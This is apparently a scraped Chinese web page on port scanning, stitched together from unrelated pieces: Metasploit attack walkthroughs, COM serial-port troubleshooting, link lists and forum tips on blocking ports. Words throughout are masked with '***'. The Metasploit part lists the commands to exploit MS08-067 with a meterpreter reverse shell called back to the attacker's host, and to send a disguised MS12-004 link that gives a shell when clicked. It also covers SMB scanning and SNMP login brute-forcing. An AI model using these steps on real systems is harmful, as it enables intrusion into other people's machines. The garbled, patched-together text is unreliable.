端口扫描站长工具_端口扫描2019

hacker|
202

2019-01-16 查看ubuntu当前服务和监听端口

有几种 *** 来查看当前服务和端口

1、使用lsof命令

2、使用netstat命令

3、使用nmap命令sudo nmap -sT -O localhost 或者 sudo nmap -sTU -O localhost 扫描TCP / TCP及UDP

TCP/UDP端口一起扫描

如何用Metasploit扫描端口

一、调用Nmap进行扫描

进入msf命令行后直接输入nmap –v –sVip(具体命令和nmap一样)

二、MSF模块扫描

Use auxiliary/scanner/postscan/syn

先用搜索命令搜索有关端口扫描的工具:searchportscan

我们使用Use auxiliary/scanner/postscan/syn

看一下参数配置 showoptions

我们先来设置一下网卡

Set INTERFACE eth0

设置一下扫描的端口,我们这里来扫描80:set PORTS 80

设置扫描目标RHOSTS :set RHOSTS 119.63.37.149

在设置一下线程:set THREADS 100

看一下我们设置好的

这时候我们都设置好了,我们来攻击下,看看效果,用命令run进行攻击

缺点就是扫描的速度有点慢啊

MetaSploit *** B扫描获取系统信息

还是搜索一下 *** b:search *** b

这次发现搜出来很多,我们用这个模块

Use auxiliary/scanner/ *** b/ *** b_version

看一下需要设置的参数

设定目标ip:set RHOSTS 192.168.188.140

在设置一下线程:set THREAD 10

然后run一下,查看结果

直接扫描出来小伙伴的系统还有主机名,速度不到1s,很快

也可以批量扫描设置批量扫描目标即可 set RHOSTS 192.168.188.50-200

MetaSploit服务识别

我们这里对SSH和FTP进行识别

在这里使用这个模块:use auxiliary/scanner/ssh/ssh_version

然后我们设置一下参数,这里讲设置好的参数截图看一下

Run一下看看结果,其实没有扫出来,好像是屏蔽了,但是用nmap却扫出来了ssh

在试一下ftp,用这个模块:use auxiliary/scanner/ftp/ftp_version

设置下参数

可以看到结果,也没有扫描出来;

MetaSploit SNMP扫描与枚举

搜索一下snmpuse auxiliary/scanner/snmp/snmp_login

看一下他的参数设置

这个参数还是很多的

设定一下目标

然后在run一下

枚举用这个模块

use auxiliary/scanner/snmp/snmp_enum

设置好目标和线程后run一下就可以

MetaSploit远程代码执行

搜索一下08-067,使用这个攻击载荷

use exploit/windows/ *** b/ms08_067_netapi

同样来看一下参数设置

我们只要设置一下目标就可以,然后我们需要一个载荷来反弹shell

set payload windows/meterpreter/reverse_tcp

然后设置参数

将LHOST 设置为自己的ip(对外攻击不要忘了段口转发)

比如说知道对面的系统是什么版本,可以指定targer,用target查看一下都有什么版本

设置一下目标,假设我们目标机器的系统为10:set target 10

这时候,我们再来看一下其参数设置,发现比以前完备了好多

08-067是不会自动识别系统版本的,但是其他的可以自动识别,所以用其他攻击载荷的时候可以不用设置

然后输入exploit进行攻击即可

这时候会出来一个meterpreter

我们在里面输入shell,就会反弹一个shell

这样整个攻击过程就完成了

MetaSploit MIDI文件解析远程代码执行

还是来搜索12-004

设置下本机ip set SRVHOST ip

然后攻击

会生成一个连接,但是这个链接容易让人发现,所以我们可以伪装下ip利用URIPATH参数就可以伪装

在设置时,会发现报红,因为4444端口被占用了,所以我们改下监听端口 set LPORT 5555

然后生成连接

只要目标点了这个链接,那么我们就会上线一个shell

说一下,目标点击后我们这边并没有反映,我们需要输下session查看当前会话,会找到上线的机子,连接上线的机子

Session –I 1(id)

然后输入shell就可以拿到shell

怎样扫描摄像头端口

1、选择端口扫描工具

打开下载好的 *** 百宝箱APP,找到运维类-端口扫描。

2、设置端口扫描参数(本例中假设设备管理IP是:172.16.1.254扫描端口范围1-65535)

页面中IP地址输入172.16.1.254,端口范围输入1-65535,点击扫描,如下图所示。

此时可以找到设备开放的管理端口信息。

com1和com2端口链接异常

右键点击【计算机】,选择【属性】-【设备管理器】:

2.打开设备管理器之后,展开【端口】信息,检查通信端口com1是否已启用,如果未被启用,可以选中端口点击右键,选择【启用】即可。

3.双击端口,查看设备状态:

方案二:检查com1端口是否被其它程序占用

1.打开设备管理器后,如果端口已经启用并且com1运转正常,则有可能是因为被其他程序占用而产生访问被拒绝的报错。

2.选中端口点击右键,选择【禁用】,使其停止运行:

3.完成设置后重启计算机,如果有程序使用"com1"端口,该程序这时将会出现错误。这样就能知道是那个程序在使用该端口了。停止运行或者卸载该程序,并且重启启用端口即可解除占用。

方案三:更新端口驱动

1.打开设备管理器,右键点击端口,选择【更新驱动程序软件】

2.在计算机中手动查找并安装驱动程序软件:

解决方案四:

1.在【360安全卫士】—【软件管家】—【软件宝库】的【全部软件】里下载【驱动大师】安装。(如图1)

图1

2.运行【驱动大师】,找到【主板】点击【更新】。(如图2)

图2

3.安装完毕之后重新启动电脑即可。

访问其他计算机被拒绝

家里宽带怎么办理

精选推荐

广告

对端口Com1的访问被拒绝

8095阅读·0评论·1点赞

2016年6月18日

彻底解决COM端口被占用(在使用中)问题的办法

38下载·0评论

2020年8月1日

windows COM端口被占用(在使用中)解决办法

652阅读·0评论·1点赞

2022年10月24日

对端口com2的访问被拒绝_端口扫描防御手段

683阅读·0评论·0点赞

2020年12月3日

C#串口判定USB是否拔出问题检测/弹出“对窗口的访问被拒绝”

828阅读·0评论·0点赞

2022年3月30日

C# 串口编程 对端口的访问被拒绝

3089阅读·0评论·0点赞

2019年9月26日

颜料颜色的比较

精选推荐

广告

计算机端口com1,访问端口“COM1”被拒绝(Access to the port “COM1” is denied)

5057阅读·0评论·0点赞

2021年7月31日

端口访问被拒绝的解决方案

1.0W阅读·0评论·0点赞

2020年7月25日

如何关闭端口号

107阅读·0评论·0点赞

2019年10月5日

winform访问被拒绝_c# – 为什么访问com端口被拒绝?

799阅读·0评论·0点赞

2020年12月31日

记录Win10因为管理员权限而出现的访问COM口被占用的问题

766阅读·0评论·0点赞

2021年4月28日

centos7端口无法访问端口拒绝访问解决办法

2.7W阅读·0评论·3点赞

2019年2月18日

对端口“COM2”的访问被拒绝。

2.9W阅读·2评论·2点赞

2011年8月31日

对端口com2的访问被拒绝_思科访问控制列表(ACL)设置,控制 *** 访问

1061阅读·0评论·0点赞

2020年11月24日

对"com1"的访问被拒绝

3010阅读·0评论·0点赞

2006年12月1日

去首页

看看更多热门内容

端口老是被扫描

有可能是对方故意或者无意(比如中毒了)导致不停扫描你的计算机,不过如果你的防火墙已经将其拦截就不会有太大问题,解决 *** 不太好办,即便你封了这个IP,也可能有其他IP对你攻击的。

端口被扫描怎么办?

楼主你好,端口一天被扫描几十次很正常,楼主可以安装带隐身功能的防火墙,也可以关闭一些端口, *** 如下

需要关闭的端口有 TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口

1打开开始菜单菜单- 控制面板-管理工具-本地IP策略-在本地计算机,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择创建 IP 安全策略,然后直到下一步的命名,在画面上把激活默认相应规则左边的钩去掉,点击完成

懒得多打字,接下来就复制一下赚分吧(*^__^*) 嘻嘻……

分割线——————————————空间里的

之一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”(如右图),于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。

第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。

第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮(如左图),这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。

点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。

第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作(右图):在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。

第五步,进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。

分割线——————————————

之后重启电脑就可以了

求采纳~

如果楼主觉得麻烦,那就装一道防火墙,国产的瑞星风云不错,推荐瑞星,智能化,操作简单,愿意花时间折腾就选毛豆~

0条大神的评论

发表评论